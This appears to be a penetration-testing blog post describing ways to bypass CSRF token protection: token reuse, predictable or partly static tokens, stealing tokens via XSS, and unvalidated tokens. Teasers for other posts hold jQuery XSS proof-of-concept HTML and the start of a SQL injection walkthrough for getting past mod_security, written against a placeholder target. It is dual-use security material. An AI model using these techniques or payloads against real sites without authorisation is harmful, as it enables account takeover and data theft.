Bypass CSRF token protection

Heya, as  web and websecurity is getting intense day by day , use of CSRF tokens are becoming a part of web security. Some time ago, use of CSRF token was enough for CSRF protection.Although, CSRF token protection can be bypassed using several  techniques. So This post briefly touches the CSRF Token Protection Bypass Methods. It means that next  time a penetration tester see a CSRF token protection, no need to be sad lol,  he knows what to do next and how to find and exploit weaknesses in CSRF token mechanism.

Token Redundancy

This flaw in CSRF token protection mechanism uses the same CSRF token multiple times, which means that , the same token can be used in our attack payload which is used by our legit request before. In ideal situation, every token has an expiry which means that once the token is used it get expired and cannot be used again. Although, in Web Applications, poor sense of security by developers can lead to such flaws. While pentesting tokens investigating token redundancy can come in handy ;).

 Weak Token Encryption / Validation

The CSRF token is a string, it can be an encrypted string of some value which keeps on incrementing and hence changing the token value. let say the CSRF token of a change password form is
    md5(User_email, inc) //inc is numerical value that keeps on incrementing
The User_email is the email of the logged in legitimate user. This is a weak encryption, because after investigation, the attacker can predict the value of the next token.

It is also possible that some value of the token gets changed or incremented and the other half remains same for example. A Token value is
    SASDwakawe3ioxujwSXjiXguaxSGQjnjSjkaEEnkjxOOa12
The next token is
    SASDwakawe3ioxujwSXjiXguaxSGQjnjSjkaEEnkjxOOa13 //incrementing from backwards, then incrementing the letters like "a" and so on.
This token behavior can also be predicted. After investigation the attacker can predict the next Anti_CSRF token and can use in attack payload.

In Such cases where the token is composed of two parts, and one half remains static the other keeps changing but the attacker is not able to predict the dynamic part of the token. Attacker should investigate can the static part of  Anti_CSRF token gets validated without the dynamic part. For example two CSRF tokens
  MXAfiaW3IFUAxh820dOXADjwsiwDSajaSFFao/9cdfb439c7876e703e307864c9167a15
This shows that the Anti_CSRF Token is composed of two strings. The last part is clearly a MD5. If the former part remains static in all requests and the MD5 hash keeps on changing. It is worth the effort to check either the application validates the token as a whole or what happens of we only provide the static part of the token.

Bypass Anti CSRF Token By Using XSS (Cross Site Scripting)

The main  idea is to get Anti_CSRF token Via XSS. The website should have an XSS Vulnerability. This Article describes how to use XSS to bypass Anti_CSRF token. Credits to the Original Author Anti CSRF Token Protection Bypass Using XSS.

 Token Validation Fail

One last try attacker can make is to test either the token really getting validated? .Can the attacker able to make the request without the token? This might seem lame lol but,  hey if facebook can make such a blunder , anyone can.

All that i know and read about CSRF Token Protection Bypass Methods If you have any other technique, feel free to share.

Comments

Post a Comment

Popular posts from this blog

Location.Hash exploit || JQuery 1.11.3/1.7.2/1.6.1 Cross Site Scripting

Image
This is the code for exploiting (location.hash) JQuery for Cross Site Scripting: <html>     <head>          <title>Jquery XSS Test 1</title>                 <script type="text/javascript"                                             src=" https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js ">                 </script>                 <script>                     $(location.hash.split('#')[1]);                 </script>    </head>      <body>         Jquery DOM XSS     </body> </html> OR, <html>     <head>          <title>Jquery XSS Test 2</title>                 <script type="text/javascript"                                             src=" https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js ">                 </script>                 <
Read more

JQuery UI 1.11.4 Cross Site Scripting

Vulnerability name: XSS Reflected JQuery UI 1.11.4  I think nearly everyone gets shocked, when your Acunetix shows Cross Site Scripting in Jquery UI. But, may be many of you don’t know how to exploit it. So, here is a Code which will explain how to exploit vulnerabilities like these. Place the script on dialog function as shown in the Code below. <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head>     <title>XSS in closeText option of component ui dialog</title>     <script src="https://code.jquery.com/jquery-2.1.4.js"></script>     <script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>       <script>         $(document).ready(function () {             $('#dialog').dialog({ closeText: ' <script>alert("XSS")<\/script> ' });         });     </script> </head> <body>   
Read more

Bypass Mod_Security

Image
This topic is similar as Manual Sql Injection. But mod_security are protect to hack website. You can see in this screenshot. Now In this tutorial we can learn how to bypass mod_security First we need one Target Website In My case I am using this website: http://www.target.com.pk Finding The Amount Of Columns Now that you found a vulnerable site, you need to find the amount of columns. You can do this by using the "Order By" function. Your link should now look like this: Code: http://www.target.com.pk/pages.php?ID=18 order by 1--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 2--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 3--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 4--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 5--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 6--+ (error) Finding Vulnerable Columns So now that you got the amount of columns, you're going to want to see
Read more